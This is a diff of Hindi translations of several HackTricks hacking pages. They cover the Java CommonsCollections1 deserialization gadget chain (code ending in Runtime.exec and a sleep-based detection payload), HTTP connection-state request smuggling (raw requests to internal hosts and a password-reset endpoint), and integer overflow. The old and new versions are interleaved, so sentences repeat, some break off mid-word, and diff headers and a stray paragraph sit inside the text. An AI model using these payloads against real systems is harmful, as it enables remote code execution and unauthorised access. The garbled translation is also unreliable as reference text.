तो, **वे परिवर्तन कैसे चेन होते हैं?**
तो, **वे परिवर्तन कैसे श्रृंखलित होते हैं?**
```java
Map map = new HashMap<>();
Map lazyMap = LazyMap.decorate(map, chainedTransformer);
lazyMap.get("anything");
```
उपयोग की गई पेलोड के अंतिम खंड में आप देख सकते हैं कि एक **मानचित्र ऑब्जेक्ट बनाया जाता है**। फिर, `LazyMap` से `decorate` फ़ंक्शन को मानचित्र ऑब्जेक्ट और चेन किए गए ट्रांसफ़ॉर्मर्स के साथ निष्पादित किया जाता है। निम्नलिखित कोड से आप देख सकते हैं कि इससे **चेन किए गए ट्रांसफ़ॉर्मर्स** को `lazyMap.factory` विशेषता के अंदर कॉपी किया जाएगा:
आप पेयलोड के अंतिम खंड में देख सकते हैं कि एक **Map object बनाया गया है**। फिर, `decorate` फ़ंक्शन `LazyMap` से मानचित्र ऑब्ज
```java
protected LazyMap(Map map, Transformer factory) {
super(map);
@ -112,7 +112,7 @@ throw new IllegalArgumentException("Factory must not be null");
this.factory = factory;
}
```
और फिर महान समाप्ति को क्रियान्वित किया जाता है: `lazyMap.get("कुछ भी");`
और फिर महान अंत को क्रियान्वित किया जाता है: `lazyMap.get("anything");`
यह `get` फ़ंक्शन का कोड है:
```java
@ -125,7 +125,7 @@ return value;
return map.get(key);
}
```
और यह `transform` फ़ंक्शन का कोड है
और यह `transform` फ़ंक्शन का कोड है
```java
public Object transform(Object object) {
for (int i = 0; i < iTransformers.length; i++) {
@ -134,11 +134,7 @@ object = iTransformers[i].transform(object);
return object;
}
```
तो, याद रखें कि हमने **फैक्ट्री** के अंदर **`chainedTransformer`** को सहेज रखा था और **`transform`** फ़ंक्शन के अंदर हम **सभी उन ट्रांसफ़ॉर्मर्स के माध्यम से जा रहे हैं** और एक के बाद एक को निष्पादित कर रहे हैं। मजेदार बात यह है कि **प्रत्येक ट्रांसफ़ॉर्मर `object` का उपयोग कर रहा है** और **ऑब्जेक्ट पिछले ट्रांसफ़ॉर्मर द्वारा निष्पादित होने वाला आउटपुट है**। इसलिए, **सभी ट्रांसफ़ॉर्म्स एक साथ चल रहे हैं और खतरनाक पेलोड को निष्पादित कर रहे हैं**
### सारांश
अंत में, lazyMap द्वारा चेन्ड ट्रांसफ़ॉर्मर्स को get मेथड के अंदर कैसे प्रबंधित किया जाता है, ऐसा लगता है जैसे हम निम्नलिखित कोड को निष्पादित कर रहे हों:
इसलिए, याद रखें कि **फैक्टरी** के अंदर हमने **`chainedTransformer`** को सहेजा था और **`transform`** फ़ंक्शन के अंदर हम **सभी उन ट्रांसफ़ॉर्मर्स के माध्यम से जा रहे हैं जो एक के बाद एक चेन किए गए हैं** और एक के बाद एक को क्रियान्वित कर रहे हैं। मजेदार बात यह है कि **प्रत्येक ट्रांसफ़ॉर्मर `object` का उपयोग कर रहा है** और **ऑब्ज
```java
Object value = "someting";
@ -159,15 +155,15 @@ new Class[]{String.class},
command
).transform(value); //(4)
```
_ध्यान दें कि `value` प्रत्येक ट्रांसफॉर्म का इनपुट है और पिछले ट्रांसफॉर्म का आउटपुट है, जो एक-लाइनर का निष्पादन संभव बनाता है:_
_ध्यान दें कि `value` प्रत्येक transform का इनपुट है और पिछले transform का आउटपुट है, जिससे एक-लाइनर का निष्पादन संभव होता है:_
```java
((Runtime) (Runtime.class.getMethod("getRuntime").invoke(null))).exec(new String[]{"calc.exe"});
```
नोट करें कि यहां **गैजेट्स की व्याख्या की गई थी** जो **ComonsCollections1** पेलोड के लिए उपयोग की जाती है। लेकिन यह छोड़ दिया गया है कि **इसका आरंभ कैसे होता है**। आप यहां देख सकते हैं [यहां कि **ysoserial**](https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java), इस पेलोड को निष्पादित करने के लिए, एक `AnnotationInvocationHandler` ऑब्जेक्ट का उपयोग करता है क्योंकि **जब इस ऑब्जेक्ट को डिसीरियलाइज किया जाता है**, यह **पेलोड को पुनः निष्पादित करेगा**
ध्यान दें कि यहाँ **उन गैजेट्स की व्याख्या की गई थी** जो **ComonsCollections1** पेलोड के लिए उपयोग किए गए थे। लेकिन यह **बचा है कि यह सब कैसे आरंभ होता है**। आप यहाँ देख सकते हैं [यहाँ कि **ysoserial**](https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java), इस पेलोड को निष्पादित करने के लिए, एक `AnnotationInvocationHandler` ऑब्जेक्ट का उपयोग करता है क्योंकि **जब इस ऑब्जेक्ट को डीसीरियलाइज़ किया जाता है**, तो यह `payload.get()` फ़ंक्शन को **आमंत्रित** करेगा जो पूरे पेलोड को **निष्पादित** करेगा
## जावा थ्रेड स्लीप
यह पेलोड **उपयोगी हो सकता है ताकि पता लगा सके कि क्या वेब कमजोर है क्योंकि यदि हां तो यह एक स्लीप निष्पादित करेगा**।
यह पेलोड **हैंडी हो सकता है ताकि पता लगाया जा सके कि क्या वेब कमजोर है क्योंकि यह एक स्लीप को निष्पादित करेगा अगर यह है**।
```java
import org.apache.commons.*;
import org.apache.commons.collections.*;
@ -210,7 +206,7 @@ lazyMap.get("anything");
}
}
```
## अधिक गैजेट्स
## अधिक गैजेट
आप यहाँ अधिक गैजेट्स पा सकते हैं: [https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html](https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html)
@ -220,10 +216,10 @@ lazyMap.get("anything");
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने की अनुमति** चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके साझा करें।**
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह देखें
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर पर फॉलो** करें **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**।
</details>

View file

@ -1,27 +1,27 @@
# PDF अपलोड - XXE और CORS बापास
# PDF अपलोड - XXE और CORS बापास
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप **cybersecurity company** में काम करते हैं? क्या आप अपनी **company का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण तक पहुँचना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) देखें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** पर मुझे **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* अपनी hacking tricks साझा करें, [hacktricks repo](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटीज़**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम ग्रुप**](https://t.me/peass) या मुझे **ट्विटर पर फॉलो** करें **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**।**
* **अपने हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**
</details>
**[https://insert-script.blogspot.com/2014/12/multiple-pdf-vulnerabilites-text-and.html](https://insert-script.blogspot.com/2014/12/multiple-pdf-vulnerabilites-text-and.html) देखें**
**जाँच करें [https://insert-script.blogspot.com/2014/12/multiple-pdf-vulnerabilites-text-and.html](https://insert-script.blogspot.com/2014/12/multiple-pdf-vulnerabilites-text-and.html)**
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप **cybersecurity company** में काम करते हैं? क्या आप अपनी **company का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण तक पहुँचना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) देखें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** पर मुझे **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* अपनी hacking tricks साझा करें, [hacktricks repo](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटीज़**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम ग्रुप**](https://t.me/peass) या मुझे **ट्विटर पर फॉलो** करें **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**।**
* **अपने हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**
</details>

View file

@ -1,24 +1,24 @@
# HTTP Connection Request Smuggling
# HTTP कनेक्शन रिक्वेस्ट स्मग्लिंग
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी को हैकट्रिक्स में विज्ञापित** किया जाए? या क्या आप **PEASS के नवीनतम संस्करण का उपयोग करना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक पीएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**।**
* **अपने हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**।
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह देखें
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।**
* **हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके।**
</details>
**यह पोस्ट [https://portswigger.net/research/browser-powered-desync-attacks](https://portswigger.net/research/browser-powered-desync-attacks) का सारांश है**
**यह पोस्ट का सारांश है [https://portswigger.net/research/browser-powered-desync-attacks](https://portswigger.net/research/browser-powered-desync-attacks)**
## Connection State Attacks <a href="#state" id="state"></a>
## कनेक्शन स्थिति हमले <a href="#state" id="state"></a>
### पहली-अनुरोध मान्यता
### पहली रिक्वेस्ट मान्यता
रिवर्स प्रॉक्सी रिक्वेस्ट को रूट करते समय, गलती से कुछ प्रॉक्सी में **होस्ट हेडर** पर निर्भर कर सकते हैं ताकि वे पिछले-एंड सर्वर का निर्धारण कर सकें, अक्सर उन्हें पहुंचने की अनुमति दी जाने वाली होस्ट की सफेद सूची पर निर्भर होता है। हालांकि, कुछ प्रॉक्सी में एक सुरक्षा गड़बड़ी होती है जहां सफेद सूची केवल कनेक्शन में पहले अनुरोध पर ही लागू होती है। इसके परिणामस्वरूप, हमलावर इसे इस तरह से शारू कर सकते हैं कि पहले किसी अनुमति प्राप्त होस्ट को अनुरोध करके और फिर उसी कनेक्शन के माध्यम से आंतरिक साइट का अनुरोध कर इसका शारू कर सकते हैं:
रिवर्स प्रॉक्सी जब रिक्वेस्ट रूट करते हैं, तो डेस्टिनेशन बैक-एंड सर्वर निर्धारित करने के लिए **होस्ट हेडर** पर निर्भर कर सकते हैं, अक्सर उन्हें पहुंचने की अनुमति देने वाले होस्ट की सफेद सूची पर भरोसा करते हैं। हालांकि, कुछ प्रॉक्सी में एक सुरक्षा गड़बड़ी होती है जहाँ सफेद सूची केवल कनेक्शन में पहली रिक्वेस्ट पर लागू होती है। इसके परिणामस्वरूप, हमलावर इसे इस तरह से उत्पन्न कर सकते हैं कि पहले किसी अनुमत होस्ट पर एक रिक्वेस्ट भेजकर फिर उसी कनेक्शन के माध्यम से एक आंतरिक साइट का अनुरोध करें:
```text
GET / HTTP/1.1
Host: [allowed-external-host]
@ -28,7 +28,7 @@ Host: [internal-host]
```
### पहली अनुरोध मार्गनिर्धारण
कुछ कॉन्फ़िगरेशन में, एक फ्रंट-एंड सर्वर **पहले अनुरोध के होस्ट हेडर** का उपयोग कर सकता है ताकि उस अनुरोध के लिए पिछले-एंड कनेक्शन का मार्गनिर्धारण किया जा सके, और फिर सभी आगामी अनुरोधों को उसी पिछले-एंड कनेक्शन पर स्थायी रूप से मार्गिकृत कर सकता है। इसे इस प्रकार प्रदर्शित किया जा सकता है:
कुछ कॉन्फ़िगरेशन में, एक फ्रंट-एंड सर्वर **पहले अनुरोध के होस्ट हेडर** का उपयोग कर सकता है ताकि उस अनुरोध के लिए पिछले-एंड को मार्गिकरण करें, और फिर सभी आगामी अनुरोधों को उसी पिछले-एंड कनेक्शन पर स्थायी रूप से मार्गित करें। इसे इस प्रकार प्रदर्शित किया जा सकता है:
```text
GET / HTTP/1.1
Host: example.com
@ -36,8 +36,21 @@ Host: example.com
POST /pwreset HTTP/1.1
Host: psres.net
```
यह समस्या संभावित रूप से [होस्ट हेडर हमलों](https://portswigger.net/web-security/host-header) के साथ कंबाइन की जा सकती है, जैसे पासवर्ड रीसेट पॉइजनिंग या [वेब कैश पॉइजनिंग](https://portswigger.net/web-security/web-cache-poisoning), अन्य वंशाज या अतिसंदेहित पहुंच को उत्पन्न करने के लिए या अतिरिक्त वर्चुअल होस्ट्स तक अनधिकृत पहुंच प्राप्त करने के लिए।
यह मुद्दा संभावित रूप से [होस्ट हेडर हमलों](https://portswigger.net/web-security/host-header) के साथ कंबाइन किया जा सकता है, जैसे पासवर्ड रीसेट पॉइजनिंग या [वेब कैश पॉइजनिंग](https://portswigger.net/web-security/web-cache-poisoning), अन्य भेदभावों का शोषण करने या अतिरिक्त वर्चुअल होस्ट्स तक अनधिकृत पहुंच प्राप्त करने के लिए।
{% hint style="info" %}
इन वंशाजों की पहचान के लिए, HTTP रिक्वेस्ट स्मग्लर में 'कनेक्शन-स्टेट प्रोब' फीचर का उपयोग किया जा सकता है।
इन भेदभावों की पहचान के लिए, HTTP रिक्वेस्ट स्मग्लर में 'कनेक्शन-स्टेट प्रोब' विशेषता का उपयोग किया जा सकता है।
{% endhint %}
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापन देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटीज**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक पीएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**
</details>

View file

@ -4,11 +4,11 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को हैकट्रिक्स में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family)
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या मुझे **ट्विटर** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **हैकिंग ट्रिक्स साझा करें और PRs के माध्यम से [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में सबमिट करें।**
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक पीएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**।
</details>
@ -28,7 +28,9 @@ println!("{}", add_result);
```
{% endtab %}
{% tab title="C" %}
{% tab title="C" %}इंटीजर ओवरफ्लो क्या है?
इंटीजर ओवरफ्लो एक सीरियस सिक्योरिटी वन्य है जिसमें एक प्रोग्राम या सिस्टम को एक इंटीजर डेटा परिमाण से अधिक डेटा प्राप्त होता है, जिससे अनुरूप व्यवहार या सिक्योरिटी समस्याएं उत्पन्न हो सकती हैं। यह एक कॉमन प्रोग्रामिंग गलती है जो कि हैकर्स को एक सिस्टम पर अधिक डेटा प्राप्त करने के लिए उपयोग कर सकते हैं। इंटीजर ओवरफ्लो को ठीक करने के लिए सुरक्षा पैचेस और डेटा स्वरूपण की तकनीकें हो सकती हैं। %}
```c
#include <stdio.h>
#include <limits.h>
@ -47,17 +49,14 @@ printf("%d\n", c);
return 0;
}
```
{% endtab %}
{% endtabs %}
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड** करने की अनुमति चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह,
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
